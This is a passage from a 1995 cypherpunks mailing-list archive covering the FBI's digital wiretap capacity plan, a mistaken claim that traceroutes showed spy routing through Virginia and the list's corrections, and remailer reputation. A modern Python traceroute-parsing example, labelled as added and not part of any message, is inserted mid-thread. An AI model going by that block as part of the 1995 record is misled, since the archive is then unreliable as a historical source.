the FBI of the surveillance capabilities it will require under the controversial Digital Telephony Act that was signed by President Clinton in 1994. The law was adopted in the closing hours of the previous Congress after the administration overcame telephone industry resistance to the extensive network equipment changes that will be required to permit digital wiretapping. In order to overcome that opposition, the administration promised that the government would allocate $500 million to help upgrade industry networks. 
Whether the law will ever go into effect is an open question, because it requires a federal appropriation, to be paid for out of criminal fines and penalties, that Congress has not yet authorized.

The budget legislation now pending on Capitol Hill has no proviso for the digital wiretapping money, although the House budget bill included a wiretapping allocation until last week.

The House measure was deleted after objections from several freshman Republicans, including Rep. Bob Barr of Georgia, a former federal prosecutor, who said that he objected to the way the money for wiretapping would be raised and that he had concerns about how the FBI might use such a sweeping surveillance ability.

But some lawmakers say the Clinton administration, which has vowed to veto the current federal budget bill, saw little point in pushing for inclusion of the financing for the wiretapping at this time.

And others note that money for the digital wiretapping plan, presented as a tough anti-crime measure, could be difficult for lawmakers of either party to oppose outright. The FBI and the Clinton administration are expected to continue seeking funds in the future.

The scope of the FBI plan has startled telephone industry executives, who said it was difficult to estimate how much it would ultimately cost to carry out the capacity increases.

The officials are worried, however, that if federal funds are not forthcoming, the government may attempt to shift the financing burden to the rates that businesses and consumers pay to use the telephone network.

``The difficulty in this process is going to come down the road when they ask us to redesign our entire systems and not pay us,'' said Larry Clinton, associate vice president for governmental affairs at the U.S. Telephone Association, a Washington-based industry lobbying group.
``If they try to make rate payers pay for this we will run into serious and perhaps even constitutional problems which we hope to avoid.'' The FBI plan, as filed in the Federal Register, calls for designating each local telephone as falling under one of three categories. Category I would be made up of urban areas, where most electronic surveillance currently takes place. In these regions, telecommunications carriers would be required to make available up to 1 percent of their network capacity when sought by law-enforcement officials. In lower-crime urban and suburban areas, designated Category II, phone companies would need to make available up to five-tenths of a percent of their network lines, while the predominantly rural low-crime Category III areas would require 0.25 percent. For many of the most densely populated metropolitan areas, like New York, Los Angeles and Chicago, there are tens of millions of phone lines. The FBI document contends that in such places, the demands of digital wiretapping may make it necessary to intercept tens of thousands of phone calls at once. Some industry officials said they were at a loss to understand how the government expected to make use of such requirements. At an industry gathering last year, telephone industry executives discussing the Digital Telephony Act could not think of an example of more than seven wiretaps ever being run from a single phone company office at any one time, according to Ron Peat, director of federal legislation analysis for the Pacific Telesis Group, the San Francisco-based regional Bell company. Some technology experts said that the FBI's projected needs, which the bureau said were based on historical records and on demographic data and market forecasts, reflect a growing belief by law enforcement that electronic surveillance will rapidly increase in importance in the digital age, where most communications will take place using an array of mobile computerized devices. 
``These are staggering numbers,'' said Mark Rasch, director of information security law and policy for Science Applications International Corp. in McLean, Va. ``Either they do a lot more wiretaps than they now admit, or they plan on doing a significantly larger number of wiretaps in the future because of the fear of domestic terrorism.''

--
Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=- Sense Networking, Santa Cruz Node
Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89
"On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn."

From jya at pipeline.com Sun Nov 5 10:31:40 1995
From: jya at pipeline.com (John Young)
Date: Mon, 6 Nov 1995 02:31:40 +0800
Subject: lp (134.222.35.2)?
Message-ID: <199511051821.NAA20156@pipe1.nyc.pipeline.com>

Responding to msg by perry at piermont.com ("Perry E. Metzger") on Sun, 05 Nov 12:13 PM

>Quit looking for the spooks where they aren't. You
>should always assume your line is being tapped if you
>are saying something you don't want heard, anyway.

True, it's not Smokey behind the billboard, blinked at you by oncoming headlights, it's the sensors in the roadbed that reads your tag -- when it leaves your home-ain, then at the remailer donkeystops, then at your recreational stash-house, at the pedo-filmery, at the Semtex-Pantex workhide, at the digi-wallet-copyfast, right into ananonymous Ken-Barbie's e-slot.

TLA-Smokey is friendly, maybe intra-humanly let you off with a warning, not the anonymous high-techery, it responds only to its friend, the tag -- tracing, storing, mutating the whinefleshers, 0's by 1's.

That's the how, maybe, but for who or what or why? Or is it just machines feeding machines incomprehensibles?

From jya at pipeline.com Sun Nov 5 10:41:07 1995
From: jya at pipeline.com (John Young)
Date: Mon, 6 Nov 1995 02:41:07 +0800
Subject: DIR_ty$
Message-ID: <199510301238.HAA06263@pipe2.nyc.pipeline.com>

10-30-95.
In slave to Orlin Crabbe's "The Money Laundromat," The NYPaper has a Page One lead story:

"Cali Drug Cartel Using U.S. Business to Launder Cash. 105 Firms Suspected. Trade Related Schemes Said to Have Moved $3 Billion Through Companies."

DIR_ty$

From ravage at einstein.ssz.com Sun Nov 5 13:20:06 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Mon, 6 Nov 1995 05:20:06 +0800
Subject: Meeting: Nov. 4 in Austin, TX
Message-ID: <199511030104.TAA09845@einstein.ssz.com>

Hi,

A reminder to those in the central Texas area on Saturday (Nov. 4, 1995) from 6-8pm. The Austin chapter will be meeting at Ted's Greek Restaurant on the 400 block of Congress (next to Oscar Snowden's). We will be trying to wrest control of the last couple of tables in the rear.

Issues we will be discussing:

* Further interests of the members and forming working groups.
* Make further arrangements to start doing PGP key signing services at the end of the monthly EFF meeting.
* Discuss doing a 1-hour video on the basic ideas and issues of cryptography and current society.
* Invitation from CT-LUG to come to their next build-up which is scheduled for Nov. 18 but is tentative for now. If all works well this may be an opportunity to play with some re-mailer software under Linux.

Hope to see some of you there!

Jim Choate
ravage at einstein.ssz.com

From whitaker at sover.net Sun Nov 5 13:28:19 1995
From: whitaker at sover.net (Stephen Whitaker)
Date: Mon, 6 Nov 1995 05:28:19 +0800
Subject: whose watchin the watchers
Message-ID: <199511052119.QAA28698@maple.sover.net>

The following is an excerpt from Jim Warren's listserv, GovAccess 183. Are there folks on this list who have insights or definitive information on this topic? Are there ways for someone with access to modify router tables to constantly create alternate paths at other routers which would serve to end-around any such snoops?
***********begin_included_text*************************

&&&&&&&&&&&&&&&&&&&&

Is Someone Already Watching All International Net Traffic?

The following is the transcript of an actual communications trace that a friend ran, while I was sitting next to him, watching -- reprinted here with his permission.

He did a "traceroute" of two messages that he sent from his machine in Switzerland (he'd telneted into it while we were at a computer conference in California). Traceroute automatically reports each Internet node through which a message passes, as it proceeds from origin to destination.

He did two traceroutes. The first was from Switzerland to an addressee at Netcom in San Jose, California. The second was from Switzerland to an addressee in Israel.

Date: Fri, 21 Apr 95 02:54:58 +0200
From: kelvin at fourmilab.ch (John Walker)
To: jwarren at well.com
Subject: Traceroute

> /usr2/kelvin> traceroute netcom11.netcom.com
traceroute to netcom11.netcom.com (192.100.81.121), 30 hops max, 40 byte packets
 1 eunet-router (193.8.230.64) 2 ms 2 ms 2 ms
 2 146.228.231.1 (146.228.231.1) 326 ms 345 ms 307 ms
 3 Bern5.CH.EU.NET (146.228.14.5) 447 ms 408 ms 364 ms
 4 146.228.107.1 (146.228.107.1) 127 ms 37 ms 36 ms
 5 Zuerich1.CH.EU.NET (146.228.10.80) 37 ms 38 ms 175 ms
 6 (134.222.9.1) 65 ms 109 ms 252 ms
 7 lp (134.222.35.2) 196 ms 179 ms 405 ms
 8 Vienna1.VA.ALTER.NET (137.39.11.1) 191 ms 179 ms 313 ms
 9 fddi.mae-east.netcom.net (192.41.177.210) 336 ms 204 ms 303 ms
10 t3-2.dc-gw4-2.netcom.net (163.179.220.181) 182 ms 251 ms 187 ms
11 t3-2.chw-il-gw1.netcom.net (163.179.220.186) 305 ms 586 ms 518 ms
12 t3-2.scl-gw1.netcom.net (163.179.220.190) 537 ms 693 ms 797 ms
13 t3-1.netcomgw.netcom.net (163.179.220.193) 698 ms 549 ms 754 ms
14 netcom11.netcom.com (192.100.81.121) 890 ms 1922 ms 1696 ms

> /usr2/kelvin> traceroute jerusalem1.datasrv.co.il
traceroute to jerusalem1.datasrv.co.il (192.114.21.101), 30 hops max, 40 byte packets
 1 eunet-router (193.8.230.64) 2 ms 3 ms 2 ms
 2 146.228.231.1 (146.228.231.1) 933 ms 853 ms 874 ms
 3 Bern5.CH.EU.NET (146.228.14.5) 1040 ms 450 ms 525 ms
 4 146.228.107.1 (146.228.107.1) 453 ms 424 ms 188 ms
 5 Zuerich1.CH.EU.NET (146.228.10.80) 64 ms 61 ms 47 ms
 6 (134.222.9.1) 80 ms 312 ms 84 ms
 7 lp (134.222.35.2) 270 ms 400 ms 216 ms
 8 Vienna2.VA.ALTER.NET (137.39.11.2) 660 ms 1509 ms 886 ms
 9 dataserv-gw.ALTER.NET (137.39.155.38) 1829 ms 1094 ms 1306 ms
10 orion.datasrv.co.il (192.114.20.22) 1756 ms 1280 ms 1309 ms
11 ...

Notice that both messages went through an unnamed site -- 134.222.9.1 and then a strangely-named site, "lp (134.222.35.2)" -- then through the same Vienna, Virginia (USA) site ... and thereafter, on to their destination. I.e., the second message went through Virginia to get from Switzerland to Israel.

The whois servers at the InterNIC and at nic.ddn.mil for MILNET Information report, ``No match for "134.222.9.1". '' and `` No match for "134.222.35.2".''

Now let me see ... which spy agencies are located in or near Virginia?

--jim

&&&&&&&&&&&&&&&&&&&&

***********end_included_text*************************

From shields at tembel.org Sun Nov 5 14:33:31 1995
From: shields at tembel.org (Michael Shields)
Date: Mon, 6 Nov 1995 06:33:31 +0800
Subject: Credentials Without Identity
In-Reply-To:
Message-ID: <47jcob$cf7@yage.tembel.org>

In article , Mats Bergstrom wrote:
> This applies very much so in Sweden too. It *is* illegal to maintain any
> database with 'information on persons' (like their email addresses) without
> approval from the Data Inspection. But it's an open secret that this law
> is broken on a massive front and no bureaucrat is really trying to uphold it.

This is the worst possible situation, because it equates to a licence to harass for the police. If you obey the law, then you are at a disadvantage compared to people who are not bound by it because they are ignoring it, and who can because they are doing government-friendly things; but if you break the law, then you can be prosecuted.

-- Shields.
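Returning to the two traces quoted from GovAccess 183 earlier in this thread: the following Python is an added example, not part of any poster's message. It parses both traces, lists the hops they share, and derives the classful network number for each hop that came back without a usable name, since the whois servers of the time matched the network number and not an individual host address. The function names are invented for the example, and the classful rule reflects the pre-CIDR addressing in use when the traces were run.

```python
import ipaddress
import re
from collections import namedtuple

Hop = namedtuple("Hop", "ttl name addr rtts_ms")

# Hop lines copied from the two traces quoted in GovAccess 183.
TRACE_NETCOM = """\
1 eunet-router (193.8.230.64) 2 ms 2 ms 2 ms
2 146.228.231.1 (146.228.231.1) 326 ms 345 ms 307 ms
3 Bern5.CH.EU.NET (146.228.14.5) 447 ms 408 ms 364 ms
4 146.228.107.1 (146.228.107.1) 127 ms 37 ms 36 ms
5 Zuerich1.CH.EU.NET (146.228.10.80) 37 ms 38 ms 175 ms
6 (134.222.9.1) 65 ms 109 ms 252 ms
7 lp (134.222.35.2) 196 ms 179 ms 405 ms
8 Vienna1.VA.ALTER.NET (137.39.11.1) 191 ms 179 ms 313 ms
9 fddi.mae-east.netcom.net (192.41.177.210) 336 ms 204 ms 303 ms
10 t3-2.dc-gw4-2.netcom.net (163.179.220.181) 182 ms 251 ms 187 ms
11 t3-2.chw-il-gw1.netcom.net (163.179.220.186) 305 ms 586 ms 518 ms
12 t3-2.scl-gw1.netcom.net (163.179.220.190) 537 ms 693 ms 797 ms
13 t3-1.netcomgw.netcom.net (163.179.220.193) 698 ms 549 ms 754 ms
14 netcom11.netcom.com (192.100.81.121) 890 ms 1922 ms 1696 ms
"""
TRACE_ISRAEL = """\
1 eunet-router (193.8.230.64) 2 ms 3 ms 2 ms
2 146.228.231.1 (146.228.231.1) 933 ms 853 ms 874 ms
3 Bern5.CH.EU.NET (146.228.14.5) 1040 ms 450 ms 525 ms
4 146.228.107.1 (146.228.107.1) 453 ms 424 ms 188 ms
5 Zuerich1.CH.EU.NET (146.228.10.80) 64 ms 61 ms 47 ms
6 (134.222.9.1) 80 ms 312 ms 84 ms
7 lp (134.222.35.2) 270 ms 400 ms 216 ms
8 Vienna2.VA.ALTER.NET (137.39.11.2) 660 ms 1509 ms 886 ms
9 dataserv-gw.ALTER.NET (137.39.155.38) 1829 ms 1094 ms 1306 ms
10 orion.datasrv.co.il (192.114.20.22) 1756 ms 1280 ms 1309 ms
"""

# hop number, optional name, address in parentheses, then the round-trip times
HOP_RE = re.compile(r"^\s*(\d+)\s+(?:(\S+)\s+)?\((\d{1,3}(?:\.\d{1,3}){3})\)(.*)$")


def parse_trace(text):
    """Turn traceroute hop lines into Hop tuples; non-hop lines are skipped."""
    hops = []
    for line in text.splitlines():
        m = HOP_RE.match(line)
        if not m:
            continue  # banner line, "* * *" timeout, or a truncated hop
        ttl, name, addr, rest = m.groups()
        rtts = [float(x) for x in re.findall(r"(\d+(?:\.\d+)?)\s*ms", rest)]
        hops.append(Hop(int(ttl), name, addr, rtts))
    return hops


def shared_hops(trace_a, trace_b):
    """Hops of trace_a whose address also appears anywhere in trace_b."""
    seen = {h.addr for h in trace_b}
    return [h for h in trace_a if h.addr in seen]


def is_unresolved(hop):
    """No name, the address echoed back as the name, or a bare label like 'lp'."""
    return hop.name is None or hop.name == hop.addr or "." not in hop.name


def classful_network(addr):
    """Class A/B/C network containing addr, decided by the first octet."""
    first_octet = int(ipaddress.IPv4Address(addr)) >> 24
    if first_octet < 128:
        prefix = 8       # class A
    elif first_octet < 192:
        prefix = 16      # class B, e.g. 134.222.0.0
    elif first_octet < 224:
        prefix = 24      # class C
    else:
        raise ValueError(f"{addr} is multicast or reserved, not class A/B/C")
    return ipaddress.ip_network(f"{addr}/{prefix}", strict=False)


def whois_targets(hops):
    """Network numbers to look up for the unresolved hops, without duplicates."""
    targets = []
    for hop in hops:
        if is_unresolved(hop):
            net = str(classful_network(hop.addr).network_address)
            if net not in targets:
                targets.append(net)
    return targets


if __name__ == "__main__":
    common = shared_hops(parse_trace(TRACE_NETCOM), parse_trace(TRACE_ISRAEL))
    for hop in common:
        state = "unresolved" if is_unresolved(hop) else "named"
        print(f"{hop.ttl:>2} {hop.addr:<15} {hop.name or '-':<20} {state}")
    print("whois on:", ", ".join(whois_targets(common)))
```
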
From rah at shipwright.com Sun Nov 5 14:39:12 1995 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 6 Nov 1995 06:39:12 +0800 Subject: e$: The Movie Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Announcing e$: The Movie 11/6/95 Almost a year ago, I noticed that traffic was tapering off on one of the digital commerce e-mail lists I'm subscribed to, www-buyinfo, which is run by Dave Kristol at ATT. So, every once in a while, I started zinging relevant crossposts over there from cypherpunks, a famous crypto list with about 20-25% e$ content. I started getting actual fan mail for this, so I kept doing it. Now, it seems that, say, 85% of all of the traffic on www-buyinfo is my cross-posting from cypherpunks. Dave says there are 500-600 people worldwide who have stayed on www-buyinfo during all this time, so it seems like I can claim at least some of them as an audience for what I'm doing, with no promotion of the list at all, except word of mouth. We've even had several discussions on the list about whether I should continue doing it, and every time we've done so, the answer has been a resounding "yes". However, www-buyinfo does have a charter, and even though what I'm doing drifts the charter substantially, I'm restricted in what I can put there. It's not fair to Dave or the subscribers for me to turn their list into my private spam channel. Also, Dave has said repeatedly that he's interested in re-tooling www-buyinfo into something more technical, so, at some point, the party's going to be over, and we'll have to pack up our tents and move on. Meanwhile, I've also taken to writing on the net, and more recently, speaking to professional groups, on the topic of e$, and I have gotten very good response to that as well. An edited version of one of my longer net.rants is in this week's InfoWorld, for instance. 
That one got me fan mail from all sorts of people (like Guy Kawasaki, Stewart Alsop, and Adam Engst, for instance) when the original version appeared first in the apple-internet-users list a while back. I've managed to have a lot of fun with this stuff. One of my suggestions on cypherpunks started ecm, the secondary market for Digicash's beta-test digital cash certificates. I had so much fun talking about digital commerce with Peter Cassidy, a freelance writer for Forbes ASAP, Wired, and the Economist, that the two of us started the Boston Society for Digital Commerce, a luncheon group that meets once a month to talk about this stuff. BSDC has about 40 members now, and our second meeting is on Tuesday. So, I've decided I'd jump into this with both feet. A friend of mine at Apple Computer, Vinnie Moscaritolo, has volunteered his time to put up a web site about e$. It's pretty much live, though still under construction, at its temporary home of http://www.webstuff.apple.com/~vinnie/rah/ . Vinnie is now in the process of hooking up a small stand-alone machine, to live somewhere else on the net besides in Apple's domain, which will house this web-site along with three mailing lists, all of which will be archived and eventually web-searchable. Over the next few weeks, we'll be starting up these lists and announcing them here. They are: * _e$_: A discussion list on digital commerce and financial cryptography and their consequences. This list will be for people who have a strong understanding of markets of all kinds, who understand the consequences of strong cryptography and digital certificate technology on public networks, and who want to make money in this environment. We welcome Entrepreneurs, Analysts, Cryptographers (Amateur and Otherwise), Free Marketeers, small-"l" libertarians, and, even (horrors!) a crypto-anarchist or two. * _e$pam_: My personal spam-channel to the universe. ;-). 
Pretty much what I do now with www-buyinfo from cypherpunks, only with all the net.sources I can find. It will have the same content touchstone as e$ will, but it will consist entirely of filtered information from secondary sources. In other words, it won't say "e$spam" until I say it says "e$spam". At some point, e$spam will have filter-fodder in it -- or some other method will be set up -- so that people who are already subscribed to one of the lists I'm filtering won't have to see things twice. We're still working on that. * _Ne$ws_, a newsletter with original content from myself and various other authors, in the same vein as Adam Engst's TidBITS, but focused on the subject of e$. I figure that there are enough different ways to pay for both my time and the resources necessary to make this work that it's now worth spending a little of my own time and resources in order to get all this started. Certainly the market for information and commentary on e$ isn't getting any smaller. I'm looking at a sort of "creep, crawl, walk, run" scenario for funding all of this. The first stage will be to solicit sponsorships, both in-kind and in plain old money. The second will probably be to determine whether subscriptions to any or all of the e$ lists or archives would ever make sense. Finally, with the advent of real digital cash on the net, and with First Virtual proving e$ trades can be done by anyone, it may be possible to do some kind of e$ micropayment-as-you-go system for things like subscriptions, web-archive access, and the like, so I'm looking at that also. Obviously, I'm don't want to price myself out of the market with all of this, because, like anything else on the net, anyone can come along and do exactly the same thing for less money, and then I'm out of business. I do think, however, that what I propose to do is worth money to the people who want it, and so I'm going to figure out how to get paid to do it. Well, that's about it. 
Watch this space for details, and wish me luck! Cheers, Bob Hettinga, impre$ario-to-be -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMJ04K/gyLN8bw6ZVAQG+2QQAowzLfmH5paNaZgrAdlEeSH9YcKysW07A B7QxbQhP9WIat2rMIA4HoIioQr+Xo5RZ3oOO+btSksHNnV1P3Q2Ca49BJxdMsQd7 GhdGoUv2/C150mH13crc3cZuOCChfisjYHM8So2XsuVjKex4ETZecDLfSn+b4yzl mtfJvZQ3e1o= =2vLb -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From jwarren at well.com Sun Nov 5 14:44:42 1995 From: jwarren at well.com (Jim Warren) Date: Mon, 6 Nov 1995 06:44:42 +0800 Subject: whose watchin the watchers -- I GOT THE EXPLANATIONS OKAY Message-ID: At 04:19 PM 11/05/95, Stephen Whitaker wrote: >The following is an exerpt is from Jim Warren's listserv, GovAccess 183. > >Are there folks on this list who have insights or definitive information on >this topic? > >Are there ways for someone with access to modify router tables to constantly >create alternate paths at other routers which would serve to end-around any >such snoops? > >***********begin_included_text************************* > >&&&&&&&&&&&&&&&&&&&& > > >Is Someone Already Watching All International Net Traffic? > >The following is the transcript of an actual communications trace that a >friend ran, while I was sitting next to him, watching -- reprinted here >with his permission. > >He did a "traceroute" of two messages that he sent from his machine in >Switzerland ... Folks, I've received ample explanations/corrections to my naive paranoia. The following will be posted in GovAccess.184, within an hour or two. Many thanks. --blushing-jim Jim Warren, GovAccess list-owner/editor (jwarren at well.com) Advocate & columnist, MicroTimes, Government Technology, BoardWatch, etc. 
345 Swett Rd., Woodside CA 94062; voice/415-851-7075; fax/<# upon request>
[puffery: John Dvorak Lifetime Achievement Award (1995); James Madison Freedom-of-Information Award, Soc. of Professional Journalists - Nor.Cal. (1994); Hugh Hefner First-Amendment Award, Playboy Foundation (1994); Pioneer Award, Electronic Frontier Foundation (its first year, 1992); founded the Computers, Freedom & Privacy confs, InfoWorld; blah blah blah :-).]

=== EXPLANATION OF WHAT GOVACCESS IS & WHERE TO FIND ITS ARCHIVES ===

GovAccess is a list distributing irregular info & advocacy regarding technology and civil liberties, citizen access to government - and government access to citizens, covert and overt.

To add or drop GovAccess, email to Majordomo at well.com ('Subject' ignored) with message:
  [un]subscribe GovAccess YourEmailAddress (insert your eaddr)
For brief description of GovAccess, send the message:
  info GovAccess

===this will be posted in GovAccess.184===

Enlightenment Regarding European Net Traffic Flowing Through Numbered Sites

If I'm gonna let my net-surveillance paranoias burn brightly, I better learn more about the technology. Which is to say, I goofed:

In #183, yesterday eve, I flamed forth about how a friend traced his messages from Switzerland to San Jose CA and to Israel -- and discovered that they "went through an unnamed site -- 134.222.9.1 and then a strangely-named site, "lp (134.222.35.2)" -- then through the same Vienna, Virginia (USA) site ... and thereafter, on to their destination."

With beady eye and suspicious mind, I then intoned, "Now let me see ... which spy agencies are located in or near Virginia?"
Well, half a dozen net-*literate* technoids quickly corrected the errors of my ways:

>Date: Sun, 5 Nov 1995 08:25:17 +0100
>Subject: GA183 booboo
>To: jwarren at well.com
>From: nobody at REPLAY.COM (Anonymous) [apparently an anonymous remailer --jim]
>Organization: RePLaY aND CoMPaNY UnLimited
>XComm: Replay may or may not approve of the content of this posting
>XComm: Report misuse of this automated service to
>
>Jim--
> Great work, but you've got to be more careful. ...
>
>I ran it by Cypherpunks and, within a half-hour, got ... [among others] ...
>
>From: Richard Huddleston
>Date: Sun, 5 Nov 1995 01:55:09 -0500
>To: cypherpunks at toad.com, nobody at REPLAY.COM
>Subject: Re: lp (134.222.35.2)?
>Sender: owner-cypherpunks at toad.com
>
>134.222.0.0 is a Class B network, so if you do 'whois' on 134.222.0.0
>(instead of the individual IP addresses) you find:
>
>European Unix Users Group (NET-EUNET-X25)
> Kruislaan 413
> NL-1098 SJ Amsterdam
> NETHERLANDS
>...

and

>X-Pgp-Fingerprint: 01107BAB1C85F1B49358D98FEAD4339E
>Date: Sat, 4 Nov 1995 23:01:42 -0800
>To: cypherpunks at toad.com
>From: Stephan Somogyi
>...
>>> Now let me see ... which spy agencies are located in or near Virginia?
>
>Oh please.
>
>The probable reason that the InterNIC doesn't know about the
>132.222.0.0 networks is because they're in Europe. If you search for
>either of the network numbers of the IP addresses mentioned above in
>the RIPE database , you will find that they
>belong to the EUnet backbone.
>
>After pinging 134.222.9.1 successfully, I telnetted to it and it
>claimed, quite plausibly, that it's a device (presumably a router) in
>Amsterdam. I am currently unable to ping 134.222.35.2; this, however,
>fills me with no dread whatsoever.
>
>Stephan Somogyi Senior Editor Digital Media

and

>Date: Sun, 05 Nov 1995 13:42:55 -0800
>From: John Fricker
>Subject: Return of Paranoia and Vienna
>
>Using nslookup to reverse resolve 134.222.15.2 reveals it to be
>"Oslo1.NO.EU.net" and 134.222.9.1 to be "Amsterdam4.NL.EU.net".
>
>Now this doesn't mean they are not nefarious, packet sniffing spy-boxes
>since I doubt the spooks would name their routers
>"cloak-and-dagger1.cia.gov".
>
>It still is strange that it is cheaper for UUnet/EUnet to route traffic
>across the Atlantic to get to Israel instead of developing a continental
>backbone. In many ways the architecture of the Internet is still rather
>primitive.
>
>john fricker
>dir research and development
>The Vertex Group, Inc.

followed by

>Date: Sun, 05 Nov 1995 13:23:06 -0800
>From: John Fricker
>Subject: Paranoia and Vienna
>
>Now, Jim I think you're a touch paranoid here. And after reading the
>latest about the FBI wire tap bill I don't blame you ;)
>
>134.222.0.0 is in the EU domain so most likely both of those routers are
>European. The packets then went into UU Net Technologies Vienna hub. I did
>a traceroute from me to 193.8.230.64 and went through two EU.net routers
>in Vienna, VA. Vienna must be one fiberous town! Sure would make for a
>nice little listening post for nosy ears. I don't know off hand the
>relationship between EUnet and UUnet but I would guess that they are more
>than just friendly. Microsoft bought a minority interest in UUnet which
>inspired UUnet to grow rapidly. (Now there's another tidbit for paranoia!)

===

Oh ... sez I .

So the remaining question was -- why would a msg from Switzerland go through Alternet in Virginia on its way to Israel? I asked several of the [many] folks who enlightened me re the numbered sites, and within minutes, got back:

>From: Tim Pozar
>Date: Sun, 5 Nov 1995 11:28:44 -0800 (PST)
>
>...
>> So the only remaining question is ... why should a Swizz msg go thru
>> Alternet in Virginia in order to get to Israel?
>
>A number of links go through there. Most of this is tied up with
>politics and policies with the links that go over to Europe and
>little to do with the NSA. ...

Which leaves me without any inflammatory paranoia at all ... except to wonder about those "politics and policies" that cause traffic from and to European sites to flow through a site near the NSA and CIA.

===

To which, I just received this additional response -- email traffic's hot 'n' heavy (sender prefers to be anon :-):

Almost certainly just a matter of available capacity or administrative issues. There may be higher bandwidth routes available from both of those points to the U.S., rather than directly to each other, so the traffic is routed that way. There are often administrative issues too--that is, sometimes the direct routes are controlled by some company or group to which a different net doesn't subscribe, and they have to route differently, through entities that they both subscribe to or have agreements with (e.g. Alternet). This happens a bunch in Europe (and here for that matter--it's part of the reason that some traffic from L.A. to S.F. used to route through Atlanta or NY or similar places--and still can (depending on the service providers). The topology of the net is "logically" sensible, but not necessarily geographically so...

--spooky jim, who can't tell a carburetor from a crankshaft, net-wise

&&&&&&&&&&&&&&&&&&&&

Net Police, Take Note: Net is the Fastest Self-Correcting Human System I Know

On the upside of the above notes is that they [again] illustrate how quickly the net corrects erroneous postings -- which is my answer to all those who howl for censorship or content-control of the net, "because it distributes incorrect information."
It does -- but it also distributes, uh, "vigorous" corrections to any iota of intended or naive imperfection in a posting, at least to the extent that such postings receive significant circulation on the net. (And if they don't, then they are little different than the erroneous information that people exchange by voice and phone, every day.) And woe be unto the reputation of anyone who appears to have posted *intentionally* incorrect or biased-incomplete information -- who get vigorously torched in the process of getting corrected. :-) I think it was John Perry Barlow who observed that, the best way to get a question answered on the net, was to post it in the form of an erroneous statement. --jim From wiltship at iccu6.ipswich.gil.com.au Sun Nov 5 14:49:26 1995 From: wiltship at iccu6.ipswich.gil.com.au (PeterWiltshire) Date: Mon, 6 Nov 1995 06:49:26 +0800 Subject: lp (134.222.35.2)? Message-ID: <199511052237.JAA25268@iccu6.ipswich.gil.com.au> > >Anonymous writes: >> > Notice that both messages went through an unnamed site -- 134.222.9.1 and >> > then a strangely-named site, "lp (134.222.35.2)" >[...] >> > Now let me see ... which spy agencies are located in or near Virginia? > A hopcheck from here puts these sites in amsterdam nl. cheers peter Flight to Quality Wiltshire Productions Pty Ltd Brisbane, Queensland, Australia Intl Voice 61 7 3376 3535 Intl Fax 61 7 3279 4027 Email wiltship at gil.com.au PGP Key ID 3E584C7D PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10 From perry at piermont.com Sun Nov 5 16:06:51 1995 From: perry at piermont.com (Perry E. Metzger) Date: Mon, 6 Nov 1995 08:06:51 +0800 Subject: FBI seeks huge wiretapping system In-Reply-To: <9511021924.AA12407@alpha> Message-ID: <199511022239.RAA06803@jekyll.piermont.com> Mike McNally writes: > > hallam at w3.org writes: > > It is a fair point that just because technology has changed the > > nature of the game it should not mean that wiretaps cease to be > > possible. 
> > I disagree that this is a "fair point". That wiretaps are possible is > an accident of design. Just because that slice of the salami appears > gone, I see no reason to concede that it can't be re-attached. Indeed, I have searched both the constitution and my collected works of Nietzsche and found no reference to the inalienable right of governments to listen in on any conversations, let alone the 1% of conversations the FBI wants access to. By the way, I believe the quantity in question exceeds the quantity tapped by the East German government at its height -- certainly it does if you take into account the fact that phones were more scarce there. Thank you, Louis Freeh, for taking another step towards the police state. Perry From nobody at REPLAY.COM Sun Nov 5 16:58:06 1995 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 6 Nov 1995 08:58:06 +0800 Subject: whose watchin Cypherpunks: nym question Message-ID: <199511060047.BAA06872@utopia.hacktic.nl> Stephen Whitaker-nym's resubmission ("whose watchin the watchers" 4:19 PM 11/5/95) of the very same material that I had posted last night suggest some questions about some aspects of nym theory. I hope the following isn't too naive, and I apologize if it is. When I saw issue 183 of GovAccess, Jim Warren-nym's remarks seemed suspect, but I didn't have a thorough enough understanding of the issues to judge them myself -- so I decided to vet the question with the Cypherpunks. I'm glad I did: the quick and knowledgeable responses clarified the error, and I forwarded them to Warren-nym so that he could correct himself promptly. The end result, as Warren rightly suggests I think, is that a better understanding of the issues has been propagated to his subscriber base. AFAIK, Warren-nym has an excellent reputation -- and that fact certainly encouraged me to provide him with the info he would need to correct himself quickly. 
OTOH, my actions garner no reputation for me -- neither for my True Name nor for nobody at REPLAY.COM. Of course, whether such actions merit any reputational shift is debatable: I contributed no knowledge of my own, just merely acted as a go-between. Still, the fact that GovAccess 184 quotes my response might suggest that I beat others to the punch; and were I able to act in such a capacity on a regular and consistent basis, and were I to do so in a field with higher stakes, I would surely garner a reputation. Granted, this is a lot of "woulda, coulda" -- but it leads me to conclude that it is not the shortcomings of my *action* that are the cause of the fact that I garner no reputational improvement in this instance. Stephen Whitaker-nym's resubmission of this material, OTOH, lowers his reputation in my eyes -- which is strange, because the only real distinction between what he did and what I did has to do with the fact that he sent mail to Cypherpunks without reading the Cypherpunks traffic. So his reputational shift is purely contextual. So why don't I, then? Well, for starters, the nym that the Replay remailer assigned to me is publicly accessible: anyone who uses this remailer in the way that I did will be assigned the same quasi-nym, nobody at REPLAY.COM. yet if, through some statistical improbability, I were the *only* person *ever* to use this remailer in this way, and I *only* ever used it to perform actions that would improve the reputation of a stable nym, then the public knowledge of Replay's functionality would neverthless serve to hinder any reputational shift that my actions had earned: people might say, "Every message I know of that has passed through Replay has been accurate, timely, and significant" -- but that would improve the reputation of the Replay remailer rather than of its sole user, myself, even though it was my actions -- *including* the use of the Replay remailer -- that brought about this reputational shift. 
